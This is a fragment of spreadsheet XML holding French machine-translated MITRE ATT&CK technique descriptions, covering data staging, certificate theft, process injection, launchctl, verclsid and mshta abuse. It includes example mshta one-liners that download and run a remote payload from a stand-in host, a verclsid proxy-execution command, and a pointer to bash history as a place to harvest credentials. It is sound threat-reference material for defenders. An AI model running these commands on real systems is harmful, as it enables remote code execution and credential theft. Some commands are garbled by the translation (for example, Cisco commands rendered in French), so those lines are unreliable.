    <t>Les adversaires peuvent regrouper les données collectées dans un emplacement central ou un répertoire avant l’exfiltration. Les données peuvent être conservées dans des fichiers distincts ou combinées en un seul fichier grâce à des techniques telles que [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) et bash peuvent être utilisées pour copier des données dans un emplacement de stockage. (Citation : PWC Cloud Hopper, avril 2017)
Dans les environnements cloud, les adversaires peuvent regrouper les données au sein d’une instance ou d’une machine virtuelle particulière avant de les exfiltrer. Un adversaire peut [Créer une instance cloud](https://attack.mitre.org/techniques/T1578/002) et regrouper les données dans cette instance. (Citation : Mandiant M-Trends 2020)
Les adversaires peuvent choisir de regrouper les données d’un réseau victime dans un emplacement centralisé avant l’exfiltration afin de minimiser le nombre de connexions établies à leur serveur C2 et de mieux échapper à la détection.
https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler ou falsifier des certificats utilisés pour l’authentification afin d’accéder à des systèmes ou des ressources distants. Les certificats numériques sont souvent utilisés pour signer et chiffrer des messages et/ou des fichiers. Les certificats sont également utilisés comme matériel d’authentification. Par exemple, les certificats d’appareil Entra ID et les certificats AD CS (Active Directory Certificate Services) sont liés à une identité et peuvent être utilisés comme informations d’identification pour les comptes de domaine. (Citation : O365 Blog Azure AD Device IDs)(Citation : Présentation de Microsoft AD CS)
Les certificats d’authentification peuvent être à la fois volés et falsifiés. Par exemple, les certificats AD CS peuvent être volés à partir d’un stockage chiffré (dans le registre ou des fichiers) (Citation : APT29 Deep Look at Credential Roaming), de fichiers de certificats égarés (c’est-à-dire [Informations d’identification non sécurisées](https://attack.mitre.org/techniques/T1552)), ou directement à partir du magasin de certificats Windows via diverses API de chiffrement. (Citation : SpecterOps Certified Pre Owned)(Citation : GitHub CertStealer)(Citation : Certificats GitHub GhostPack) Avec les droits d’inscription appropriés, les utilisateurs et/ou les machines d’un domaine peuvent également demander et/ou renouveler manuellement des certificats auprès des autorités de certification d’entreprise. Ce processus d’inscription définit divers paramètres et autorisations associés au certificat. Il convient de noter que les valeurs d’utilisation de clé étendue (EKU) du certificat définissent les cas d’utilisation de la signature, du chiffrement et de l’authentification, tandis que les valeurs de nom alternatif de l’objet (SAN) du certificat définissent les autres noms du propriétaire du certificat. (Citation : Medium Certified Pre Owned)
L’utilisation abusive de certificats pour les informations d’identification d’authentification peut entraîner d’autres comportements tels que [Mouvement latéral](https://attack.mitre.org/tactics/TA0008). Les erreurs de configuration liées aux certificats peuvent également ouvrir la voie à une [élévation de privilèges](https://attack.mitre.org/tactics/TA0004), en permettant aux utilisateurs d’emprunter l’identité d’un utilisateur ou d’usurper des comptes privilégiés ou d’obtenir des autorisations via les identités (SAN) associées à un certificat. Ces abus peuvent également permettre la [persistance](https://attack.mitre.org/tactics/TA0003) via le vol ou la falsification de certificats qui peuvent être utilisés comme [comptes valides](https://attack.mitre.org/techniques/T1078) pendant la durée de validité du certificat, malgré la réinitialisation du mot de passe de l’utilisateur. Les certificats d’authentification peuvent également être volés et falsifiés pour les comptes de machine.
Les adversaires qui ont accès aux clés privées du certificat de l’autorité de certification racine (ou subordonnée) (ou aux mécanismes de protection/gestion de ces clés) peuvent également établir la [persistance](https://attack.mitre.org/tactics/TA0003) en falsifiant des certificats d’authentification arbitraires pour le domaine victime (appelés certificats « dorés »). (Citation : Medium Certified Pre Owned) Les adversaires peuvent également cibler des certificats et des services associés afin d’accéder à d’autres formes d’informations d’identification, telles que [Golden Ticket](https://attack.mitre.org/techniques/T1558/001), les tickets d’octroi de tickets (TGT) ou NTLM en texte brut. (Citation : Medium Certified Pre Owned)
https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer un appareil sur un compte contrôlé par l’adversaire. Les appareils peuvent être inscrits dans un système d’authentification multifacteur (MFA), qui gère l’authentification auprès du réseau, ou dans un système de gestion des appareils, qui gère l’accès aux appareils et la conformité.
Les systèmes MFA, tels que Duo ou Okta, permettent aux utilisateurs d’associer des appareils à leurs comptes afin de répondre aux exigences MFA. Un adversaire qui compromet les informations d’identification d’un utilisateur peut inscrire un nouveau périphérique afin de contourner les exigences MFA initiales et d’obtenir un accès permanent à un réseau. (Citation : CISA MFA PrintNightmare)(Citation : DarkReading FireEye SolarWinds) Dans certains cas, le processus d’auto-inscription MFA peut nécessiter uniquement un nom d’utilisateur et un mot de passe pour inscrire le premier appareil du compte ou pour inscrire un appareil à un compte inactif. (Référence : Mandiant APT29 Microsoft 365 2022)
De même, un adversaire disposant d’un accès existant à un réseau peut inscrire un appareil auprès d’Entra ID et/ou de son système de gestion d’appareils, Microsoft Intune, afin d’accéder à des données ou à des ressources sensibles tout en contournant les stratégies d’accès conditionnel. (Citation : AADInternals - Enregistrement du dispositif)(Citation : AADInternals - Contournement d’accès conditionnel)(Référence : Microsoft DEV-0537) 
Les appareils enregistrés dans Entra ID peuvent être en mesure de mener des campagnes de [spearphishing interne](https://attack.mitre.org/techniques/T1534) via des e-mails intra-organisationnels, qui sont moins susceptibles d’être traités comme suspects par le client de messagerie. (Citation : Microsoft - Enregistrement de l’appareil) En outre, un adversaire peut être en mesure d’effectuer une [inondation d’épuisement de service](https://attack.mitre.org/techniques/T1499/002) sur un locataire Entra ID en inscrivant un grand nombre de périphériques. (Citation : AADInternals - BPRT)
https://attack.mitre.org/techniques/T1098/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste des connexions réseau à destination ou en provenance du système compromis auquel ils accèdent actuellement ou à partir de systèmes distants en interrogeant des informations sur le réseau. 
Un adversaire qui accède à un système faisant partie d’un environnement basé sur le cloud peut cartographier des clouds privés virtuels ou des réseaux virtuels afin de déterminer quels systèmes et services sont connectés. Les actions effectuées sont probablement les mêmes types de techniques de découverte selon le système d’exploitation, mais les informations résultantes peuvent inclure des détails sur l’environnement cloud en réseau pertinents pour les objectifs de l’adversaire. Les fournisseurs de cloud peuvent avoir différentes façons de gérer leurs réseaux virtuels. (Référence : Guide Amazon AWS VPC)(Citation : Présentation du réseau virtuel Microsoft Azure)(Citation : Présentation de Google VPC) De même, les adversaires qui accèdent aux périphériques réseau peuvent également effectuer des activités de découverte similaires pour recueillir des informations sur les systèmes et services connectés.
Les utilitaires et les commandes qui acquièrent ces informations incluent [netstat](https://attack.mitre.org/software/S0104), « net use » et « net session » avec [Net](https://attack.mitre.org/software/S0039). Sous Mac et Linux, [netstat](https://attack.mitre.org/software/S0104) et &lt;code&gt;lsof&lt;/code&gt; peuvent être utilisés pour lister les connexions actuelles. &lt;code&gt;WHO -a&lt;/code&gt; et &lt;code&gt;w&lt;/code&gt; peuvent être utilisés pour indiquer quels utilisateurs sont actuellement connectés, de la même manière que « Net Session ». De plus, des fonctionnalités intégrées natives aux périphériques réseau et à l’interface de ligne de commande du périphérique réseau](https://attack.mitre.org/techniques/T1059/008) peuvent être utilisées (par exemple, &lt;code&gt;afficher les sockets IP&lt;/code&gt;, &lt;code&gt;afficher le brief TCP&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre l’infrastructure de tiers qui peut être utilisée lors du ciblage. Les solutions d’infrastructure comprennent des serveurs physiques ou cloud, des domaines, des périphériques réseau et des services Web et DNS tiers. Au lieu d’acheter, de louer ou de louer une infrastructure, un adversaire peut compromettre l’infrastructure et l’utiliser pendant d’autres phases de son cycle de vie. (Référence : Mandiant APT1)(Citation : ICANNDomainNameHijacking)(Citation : Talos DNSpionage novembre 2018)(Citation : FireEye EPS Awakens Part 2) De plus, les adversaires peuvent compromettre de nombreuses machines pour former un botnet qu’ils peuvent exploiter.
L’utilisation d’une infrastructure compromise permet aux adversaires de mettre en scène, de lancer et d’exécuter des opérations. Une infrastructure compromise peut aider les opérations de l’adversaire à se fondre dans le trafic considéré comme normal, comme les contacts avec des sites de haute réputation ou de confiance. Par exemple, les adversaires peuvent tirer parti d’une infrastructure compromise (potentiellement également en conjonction avec des [certificats numériques](https://attack.mitre.org/techniques/T1588/004)) pour s’intégrer davantage et soutenir des campagnes de collecte d’informations et/ou de [hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : FireEye DNS Hijack 2019) De plus, les adversaires peuvent également compromettre l’infrastructure pour prendre en charge les services [Proxy](https://attack.mitre.org/techniques/T1090) et/ou proxyware. (Référence : amnesty_nso_pegasus)(Citation : Sysdig Proxyjacking)
En utilisant une infrastructure compromise, les adversaires peuvent rendre difficile l’identification de leurs actions. Avant le ciblage, les adversaires peuvent compromettre l’infrastructure d’autres adversaires. (Citation : NSA NCSC Turla OilRig)
https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de formats de fichiers spécifiques pour contourner les contrôles de marquage du Web. Sous Windows, lorsque des fichiers sont téléchargés à partir d’Internet, ils sont marqués avec un flux de données alternatif NTFS (ADS) caché nommé &lt;code&gt;Zone.Identifier&lt;/code&gt; avec une valeur spécifique connue sous le nom de MOTW. (Citation : Microsoft Zone.Identifier 2020) Les fichiers balisés avec MOTW sont protégés et ne peuvent pas effectuer certaines actions. Par exemple, à partir de MS Office 10, si un fichier MS Office a le MOTW, il s’ouvrira en mode protégé. Les exécutables étiquetés avec le MOTW seront traités par Windows Defender SmartScreen qui compare les fichiers avec une liste d’autorisation d’exécutables bien connus. Si le fichier n’est pas connu/approuvé, SmartScreen empêchera l’exécution et avertira l’utilisateur de ne pas l’exécuter. (Citation : Utilisation de VHD par Beek décembre 2020)(Citation : Outflank MotW 2020)(Citation : Intezer Russian APT décembre 2020)
Les adversaires peuvent abuser des fichiers de conteneur tels que des formats de fichiers compressés/d’archive (.arj, .gzip) et/ou d’image disque (.iso, .vhd) pour fournir des charges utiles malveillantes qui peuvent ne pas être étiquetées avec MOTW. Les fichiers conteneur téléchargés à partir d’Internet seront marqués avec MOTW, mais les fichiers qu’ils contiennent ne peuvent pas hériter du MOTW une fois qu’ils ont été extraits et/ou montés. MOTW est une fonctionnalité NTFS et de nombreux fichiers de conteneur ne prennent pas en charge les flux de données alternatifs NTFS. Une fois qu’un fichier conteneur est extrait et/ou monté, les fichiers qu’il contient peuvent être traités comme des fichiers locaux sur le disque et s’exécuter sans protection. (Citation : Utilisation de VHD par Beek décembre 2020)(Citation : Outflank MotW 2020)
https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>Les adversaires désactivent le chiffrement matériel dédié d’un périphérique réseau, ce qui peut leur permettre d’exploiter les faiblesses du chiffrement logiciel afin de réduire les efforts nécessaires à la collecte, à la manipulation et à l’exfiltration des données transmises.
De nombreux périphériques réseau, tels que les routeurs, les commutateurs et les pare-feu, effectuent le chiffrement du trafic réseau pour sécuriser la transmission sur les réseaux. Souvent, ces appareils sont équipés d’un matériel de cryptage spécial et dédié pour augmenter considérablement la vitesse du processus de cryptage et pour empêcher toute altération malveillante. Lorsqu’un adversaire prend le contrôle d’un tel appareil, il peut désactiver le matériel dédié, par exemple en utilisant [Modifier l’image système](https://attack.mitre.org/techniques/T1601), forçant l’utilisation d’un logiciel pour effectuer le chiffrement sur les processeurs généraux. Ceci est généralement utilisé en conjonction avec des attaques visant à affaiblir la force du chiffrement dans le logiciel (par exemple, [Réduire l’espace clé](https://attack.mitre.org/techniques/T1600/001)). (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des mécanismes de pré-démarrage du système d’exploitation pour établir la persistance d’un système. Au cours du processus de démarrage d’un ordinateur, le micrologiciel et divers services de démarrage sont chargés avant le système d’exploitation. Ces programmes contrôlent le flux d’exécution avant que le système d’exploitation ne prenne le contrôle. (citation : Wikipédia Booting)
Les adversaires peuvent écraser les données des pilotes de démarrage ou des microprogrammes tels que le BIOS (Basic Input/Output System) et l’interface UEFI (Unified Extensible Firmware Interface) pour persister sur les systèmes situés à une couche inférieure au système d’exploitation. Cela peut être particulièrement difficile à détecter, car les logiciels malveillants de ce niveau ne seront pas détectés par les défenses logicielles de l’hôte.
https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer une image de conteneur directement sur un hôte pour contourner les défenses qui surveillent la récupération d’images malveillantes à partir d’un registre public. Une demande de &lt;code&gt;build&lt;/code&gt; distante peut être envoyée à l’API Docker qui inclut un fichier Dockerfile qui extrait une image de base standard, telle que alpine, à partir d’un registre public ou local, puis crée une image personnalisée à partir de celle-ci. (citation : image de build docker)
Un adversaire peut tirer parti de cette API de &lt;code&gt;build&lt;/code&gt; pour créer une image personnalisée sur l’hôte qui inclut des programmes malveillants téléchargés à partir de son serveur C2, puis il peut utiliser [Deploy Container](https://attack.mitre.org/techniques/T1610) à l’aide de cette image personnalisée. (Citation : Images Aqua Build sur les hôtes)(Citation : Aqua Security Cloud Native Threat Report juin 2021) Si l’image de base est extraite d’un registre public, les défenses ne détecteront probablement pas l’image comme malveillante puisqu’il s’agit d’une image standard. Si l’image de base réside déjà dans un registre local, l’extraction peut être considérée comme encore moins suspecte puisque l’image est déjà dans l’environnement.
https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter des exécutables portables (PE) dans les processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection PE est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
L’injection PE est généralement effectuée en copiant le code (peut-être sans fichier sur le disque) dans l’espace d’adressage virtuel du processus cible avant de l’invoquer via un nouveau thread. L’écriture peut être effectuée avec des appels d’API Windows natifs tels que &lt;code&gt;VirtualAllocEx&lt;/code&gt; et &lt;code&gt;WriteProcessMemory&lt;/code&gt;, puis appelée avec &lt;code&gt;CreateRemoteThread&lt;/code&gt; ou du code supplémentaire (ex : shellcode). Le déplacement du code injecté introduit l’exigence supplémentaire de fonctionnalité pour remapper les références de mémoire. (Citation : Injection de processus élastique juillet 2017) 
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection PE peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution verclsid.exe proxy de code malveillant. Verclsid.exe est connu sous le nom d’hôte de vérification CLSID d’extension et est chargé de vérifier chaque extension de shell avant qu’elle ne soit utilisée par l’Explorateur Windows ou l’environnement de ligne de commande Windows Shell. (Citation : WinOSBite verclsid.exe)
Les adversaires peuvent abuser de verclsid.exe pour exécuter des charges utiles malveillantes. Pour ce faire, exécutez &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, où le fichier est référencé par un ID de classe (CLSID), un numéro d’identification unique utilisé pour identifier les objets COM. Les charges utiles COM exécutées par verclsid.exe peuvent être en mesure d’effectuer diverses actions malveillantes, telles que le chargement et l’exécution de scriptlets COM (SCT) à partir de serveurs distants (similaire à [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Étant donné que le binaire peut être signé et/ou natif sur les systèmes Windows, l’exécution par proxy via verclsid.exe peut contourner les solutions de contrôle d’application qui ne tiennent pas compte de son abus potentiel. (Citation : LOLBAS Verclsid)(Référence : Red Canary Verclsid.exe)(citation : BOHOPS abuse du registre COM)(Citation : Nick Tyrer GitHub)
https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre des comptes avec des services qui peuvent être utilisés lors du ciblage. Pour les opérations intégrant l’ingénierie sociale, l’utilisation d’un persona en ligne peut être importante. Plutôt que de créer et de cultiver des comptes (c’est-à-dire [Établir des comptes](https://attack.mitre.org/techniques/T1585)), les adversaires peuvent compromettre les comptes existants. L’utilisation d’un personnage existant peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation ou une connaissance du personnage compromis. 
Il existe diverses méthodes pour compromettre les comptes, telles que la collecte d’identifiants via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’identifiants sur des sites tiers, le filtrage par force brute d’identifiants (par exemple, la réutilisation de mots de passe à partir de vidages d’identifiants de violation) ou le paiement d’employés, de fournisseurs ou de partenaires commerciaux pour l’accès aux identifiants. (Citation : AnonHBGary)(Référence : Microsoft DEV-0537) Avant de compromettre des comptes, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations.
Les personas peuvent exister sur un seul site ou sur plusieurs sites (ex : Facebook, LinkedIn, Twitter, Google, etc.). Les comptes compromis peuvent nécessiter un développement supplémentaire, notamment le remplissage ou la modification des informations de profil, le développement des réseaux sociaux ou l’intégration de photos.
Les adversaires peuvent exploiter directement des comptes de messagerie compromis pour [Phishing for Information](https://attack.mitre.org/techniques/T1598) ou [Phishing](https://attack.mitre.org/techniques/T1566).
https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de launchctl pour exécuter des commandes ou des programmes. Launchctl s’interface avec launchd, le cadre de gestion des services pour macOS. Launchctl prend en charge la prise de sous-commandes sur la ligne de commande, de manière interactive ou même redirigée à partir d’une entrée standard. (Citation : Launchctl Man)
Les adversaires utilisent launchctl pour exécuter des commandes et des programmes en tant que [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s ou [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Les sous-commandes courantes sont les suivantes : &lt;code&gt;launchctl load&lt;/code&gt;, &lt;code&gt;launchctl unload&lt;/code&gt; et &lt;code&gt;launchctl start&lt;/code&gt;. Les adversaires peuvent utiliser des scripts ou exécuter manuellement les commandes &lt;code&gt;launchctl load -w « %s/Library/LaunchAgents/ %s »&lt;/code&gt; ou &lt;code&gt;/bin/launchctl load&lt;/code&gt; pour exécuter [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s ou [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation : Sofacy Komplex Trojan)(Référence : 20 Outils et techniques courants macOS)
https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre de nombreux systèmes tiers pour former un botnet qui peut être utilisé lors du ciblage. Un botnet est un réseau de systèmes compromis qui peuvent être chargés d’effectuer des tâches coordonnées. (Référence : Norton Botnet) Au lieu d’acheter/louer un botnet auprès d’un service de démarrage/stresseur, les adversaires peuvent créer leur propre botnet en compromettant de nombreux systèmes tiers. (Citation : Imperva DDoS à louer) Les adversaires peuvent également prendre le contrôle d’un botnet existant, par exemple en redirigeant les bots vers des serveurs C2 contrôlés par l’adversaire. (Citation : Dell Dridex octobre 2015) Lorsqu’ils disposent d’un botnet, les adversaires peuvent effectuer des activités de suivi telles que le [phishing](https://attack.mitre.org/techniques/T1566) ou le déni de service distribué (DDoS) à grande échelle.
https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des scripts ou des interpréteurs de ligne de commande (CLI) intégrés sur les périphériques réseau pour exécuter des commandes et des charges utiles malveillantes. L’interface de ligne de commande est le principal moyen par lequel les utilisateurs et les administrateurs interagissent avec l’appareil afin d’afficher des informations système, de modifier le fonctionnement de l’appareil ou d’effectuer des fonctions de diagnostic et d’administration. Les CLI contiennent généralement différents niveaux d’autorisation requis pour différentes commandes. 
Les interpréteurs de script automatisent les tâches et étendent les fonctionnalités au-delà de l’ensemble de commandes inclus dans le système d’exploitation réseau. L’interface de ligne de commande et l’interpréteur de script sont accessibles via une connexion directe à la console ou par des moyens distants, tels que telnet ou [SSH](https://attack.mitre.org/techniques/T1021/004).
Les adversaires peuvent utiliser l’interface de ligne de commande réseau pour modifier le comportement et le fonctionnement des périphériques réseau. L’interface de ligne de commande peut être utilisée pour manipuler les flux de trafic afin d’intercepter ou de manipuler des données, modifier les paramètres de configuration de démarrage pour charger des logiciels système malveillants ou pour désactiver les fonctionnalités de sécurité ou la journalisation afin d’éviter d’être détecté. (Citation : Cisco Synful Knock Evolution)
https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans l’historique des commandes bash sur les systèmes compromis des informations d’identification stockées de manière non sécurisée. Bash garde une trace des commandes que les utilisateurs tapent sur la ligne de commande avec l’utilitaire « history ». Une fois qu’un utilisateur se déconnecte, l’historique est vidé dans le fichier &lt;code&gt;.bash_history&lt;/code&gt; de l’utilisateur. Pour chaque utilisateur, ce fichier se trouve au même endroit : &lt;code&gt;~/.bash_history&lt;/code&gt;. En règle générale, ce fichier garde une trace des 500 dernières commandes de l’utilisateur. Les utilisateurs tapent souvent des noms d’utilisateur et des mots de passe sur la ligne de commande en tant que paramètres des programmes, qui sont ensuite enregistrés dans ce fichier lorsqu’ils se déconnectent. Les adversaires peuvent en abuser en parcourant le fichier à la recherche d’informations d’identification potentielles. (citation : externe à DA, à la manière d’OS X)
https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rétrograder ou utiliser une version des fonctionnalités du système qui peut être obsolète, vulnérable et/ou ne prenant pas en charge les contrôles de sécurité mis à jour. Les attaques de rétrogradation tirent généralement parti de la rétrocompatibilité d’un système pour le forcer à passer à des modes de fonctionnement moins sécurisés. 
Les adversaires peuvent rétrograder et utiliser diverses versions moins sécurisées de fonctionnalités d’un système, telles que [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) ou même des protocoles réseau qui peuvent être utilisés de manière abusive pour activer [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) ou [Network Sniffing](https://attack.mitre.org/techniques/T1040). (Citation : Attaque prétorienne de rétrogradation TLS 2014) Par exemple, les versions 5+ de [PowerShell](https://attack.mitre.org/techniques/T1059/001) incluent la journalisation des blocs de script (SBL) qui peut enregistrer le contenu du script exécuté. Toutefois, les adversaires peuvent tenter d’exécuter une version précédente de PowerShell qui ne prend pas en charge SBL dans le but de [Nuire aux défenses](https://attack.mitre.org/techniques/T1562) tout en exécutant des scripts malveillants qui auraient pu être détectés. (Citation : CrowdStrike BGH Ransomware 2021)(Citation : Mandiant BYOL 2018)(Référence : att_def_ps_logging)
De la même manière, les adversaires peuvent cibler le trafic réseau pour passer d’une connexion HTTPS chiffrée à une connexion HTTP non sécurisée qui expose les données réseau en texte clair. (citation : les attaques ciblées de stripping SSL sont réelles)(Citation : Crowdstrike Downgrade)
https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent fournir du contenu malveillant à un démon de service XPC pour l’exécution de code local. macOS utilise les services XPC pour la communication interprocessus de base entre différents processus, par exemple entre le démon de service XPC et les outils d’assistance privilégiés d’applications tierces. Les applications peuvent envoyer des messages au démon de service XPC, qui s’exécute en tant qu’utilisateur root, à l’aide de &lt;code&gt;l’API C&lt;/code&gt; de service XPC de bas niveau ou de l’API &lt;code&gt;NSXPCConnection&lt;/code&gt; de haut niveau afin de gérer des tâches nécessitant des privilèges élevés (telles que les connexions réseau). Les applications sont chargées de fournir la définition du protocole qui sert de modèle pour les services XPC. Les développeurs utilisent généralement les services XPC pour assurer la stabilité des applications et la séparation des privilèges entre le client de l’application et le démon. (Citation : creatingXPCservices)(Citation : Concevoir des démons Apple Dev)
Les adversaires peuvent abuser des services XPC pour exécuter du contenu malveillant. Les demandes d’exécution malveillante peuvent être transmises via le gestionnaire XPC Services de l’application. (Citation : CVMServer Vuln)(citation : Apprendre l’exploitation XPC) Cela peut également inclure l’identification et l’utilisation abusive d’une validation incorrecte du client XPC et/ou d’un nettoyage médiocre des paramètres d’entrée pour effectuer [l’exploitation à des fins d’élévation de privilèges](https://attack.mitre.org/techniques/T1068).
https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser divers moyens pour détecter et éviter les environnements de virtualisation et d’analyse. Il peut s’agir de modifier les comportements en fonction des résultats des vérifications de la présence d’artefacts indiquant un environnement de machine virtuelle (VME) ou un bac à sable. Si l’adversaire détecte un VME, il peut modifier son logiciel malveillant pour se désengager de la victime ou dissimuler les fonctions essentielles de l’implant. Ils peuvent également rechercher des artefacts VME avant de supprimer des charges utiles secondaires ou supplémentaires. Les adversaires peuvent utiliser les informations apprises grâce à la [virtualisation/évasion du bac à sable](https://attack.mitre.org/techniques/T1497) lors de la découverte automatisée pour façonner des comportements ultérieurs. (Citation : Sensibilisation à l’environnement de Deloitte)
Les adversaires peuvent utiliser plusieurs méthodes pour effectuer la [virtualisation/évasion du bac à sable](https://attack.mitre.org/techniques/T1497), telles que la recherche d’outils de surveillance de la sécurité (par exemple, Sysinternals, Wireshark, etc.) ou d’autres artefacts système associés à l’analyse ou à la virtualisation. Les adversaires peuvent également vérifier l’activité légitime d’un utilisateur pour déterminer s’il se trouve dans un environnement d’analyse. D’autres méthodes incluent l’utilisation de minuteries de mise en veille ou de boucles dans le code malveillant pour éviter de fonctionner dans un bac à sable temporaire. (Référence : Unité 42 Pirpi juillet 2015)
https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe légitime existant comme moyen de relayer des données vers/depuis un système compromis. Les sites Web populaires, les services cloud et les médias sociaux agissant comme un mécanisme pour C2 peuvent fournir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant une compromission. L’utilisation de services courants, tels que ceux proposés par Google, Microsoft ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. (Citation : Broadcom BirdyClient Microsoft Graph API 2024) Les fournisseurs de services Web utilisent généralement le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
L’utilisation de services Web peut également protéger l’infrastructure C2 back-end contre la découverte par l’analyse binaire des logiciels malveillants, tout en permettant la résilience opérationnelle (puisque cette infrastructure peut être modifiée de manière dynamique).
https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les systèmes de fichiers locaux et les partages de fichiers distants des fichiers contenant des informations d’identification stockées de manière non sécurisée. Il peut s’agir de fichiers créés par les utilisateurs pour stocker leurs propres informations d’identification, de magasins d’informations d’identification partagés pour un groupe d’individus, de fichiers de configuration contenant des mots de passe pour un système ou un service, ou de fichiers de code source/binaires contenant des mots de passe intégrés.
Il est possible d’extraire des mots de passe à partir de sauvegardes ou de machines virtuelles enregistrées via [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation : CG 2014) Les mots de passe peuvent également être obtenus à partir des préférences de stratégie de groupe stockées sur le contrôleur de domaine Windows. (Référence : SRD GPP)
Dans les environnements cloud et/ou conteneurisés, les informations d’identification des comptes d’utilisateur et de service authentifiés sont souvent stockées dans des fichiers de configuration et d’informations d’identification locaux. (Citation : Unité 42 Hildegard Malware) Ils peuvent également être trouvés en tant que paramètres des commandes de déploiement dans les journaux de conteneur. (Citation : Unité 42 Daemons Docker non sécurisés) Dans certains cas, ces fichiers peuvent être copiés et réutilisés sur une autre machine ou le contenu peut être lu puis utilisé pour s’authentifier sans avoir besoin de copier de fichiers. (Citation : Specter Ops - Stockage d’informations d’identification dans le cloud)
https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des calculs sur les adresses renvoyées dans les résultats DNS pour déterminer le port et l’adresse IP à utiliser pour la commande et le contrôle, plutôt que de se fier à un numéro de port prédéterminé ou à l’adresse IP renvoyée réelle. Un calcul d’adresse IP et/ou de numéro de port peut être utilisé pour contourner le filtrage de sortie sur un canal C2. (Citation : Panda numéroté de Meyers)
L’une des implémentations de [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) consiste à prendre les trois premiers octets d’une adresse IP dans une réponse DNS et à utiliser ces valeurs pour calculer le port pour le trafic de commande et de contrôle. (Citation : Panda numéroté de Meyers)(Citation : Moran 2014)(Citation : Rapid7G20Espionage)
https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution mshta.exe proxy de fichiers .hta malveillants et de Javascript ou VBScript via un utilitaire Windows de confiance. Il existe plusieurs exemples de différents types de menaces exploitant mshta.exe lors de la compromission initiale et pour l’exécution du code (Citation : Cylance Dust Storm) (Citation : Red Canary HTA Abuse Part Deux) (Citation : FireEye Attacks Leveraging HTA) (Citation : Airbus Security Kovter Analysis) (Citation : FireEye FIN7 avril 2017) 
Mshta.exe est un utilitaire qui exécute des fichiers Microsoft HTML Applications (HTA). (citation : application HTML de Wikipédia) Les HTA sont des applications autonomes qui s’exécutent à l’aide des mêmes modèles et technologies qu’Internet Explorer, mais en dehors du navigateur. (Citation : Applications HTML MSDN)
Les fichiers peuvent être exécutés par mshta.exe via un script en ligne : &lt;code&gt;mshta vbscript :Close(Execute(« GetObject(« "script :https[ :]//webserver/payload[.]sct" ») »))&lt;/code&gt;
Ils peuvent également être exécutés directement à partir d’URL : &lt;code&gt;mshta http[ :]//webserver/payload[.]ETS&lt;/code&gt;
Mshta.exe peuvent être utilisés pour contourner les solutions de contrôle d’application qui ne tiennent pas compte de son utilisation potentielle. Étant donné que mshta.exe s’exécute en dehors du contexte de sécurité d’Internet Explorer, il contourne également les paramètres de sécurité du navigateur. (Citation : LOLBAS Mshta)
https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
